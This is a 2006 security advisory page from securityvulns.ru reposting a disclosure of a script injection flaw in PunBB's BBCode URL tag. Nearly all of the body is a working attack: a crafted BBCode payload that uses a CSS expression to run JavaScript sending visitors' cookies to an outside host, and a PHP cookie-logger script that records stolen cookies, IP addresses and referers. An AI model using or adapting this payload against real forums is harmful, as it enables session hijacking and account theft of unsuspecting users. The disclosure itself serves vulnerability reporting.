Computer Security

Security Advisory: PunBB BBCode URL Tag Script Injection Vulnerability
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [SA18454] SMBCMS Site Search Cross-Site Scripting Vulnerability

  [SA18519] CubeCart Cross-Site Scripting Vulnerabilities

  [SA18459] PDFdirectory SQL Injection Vulnerabilities

  [SA18465] Trac HTML WikiProcessor Script Insertion Vulnerability

From:night_warrior771_(at)_hotmail.com <night_warrior771_(at)_hotmail.com>
Date:17.01.2006
Subject:PunBB BBCode URL Tag Script Injection Vulnerability

##Night_Warrior<Kurdish Hacker>
##night_warrior771[at]hotmail.com
##PunBB BBCode URL Tag Script Injection Vulnerability
##Contact :night_warrior771[at]hotmail.com

Vulnerable:

[color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:
#EFEFEF'style='top:expression(eval(this.
sss));'sss=`i=new/**/Image();i.src='="fixed">http://nigwar.tollfreepage.com/cookies.php?c='+document.cookie;this.
sss=null`style='font-size:0;][/url][/url]'[/color]

<?php
cookies.php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('steal.php', 'a');
fwrite($fp, '
Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$date. '
Referer: '.$referer.' ');
fclose($fp);
?>

Contact :night_warrior771[at]hotmail.com
Night_Warrior
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru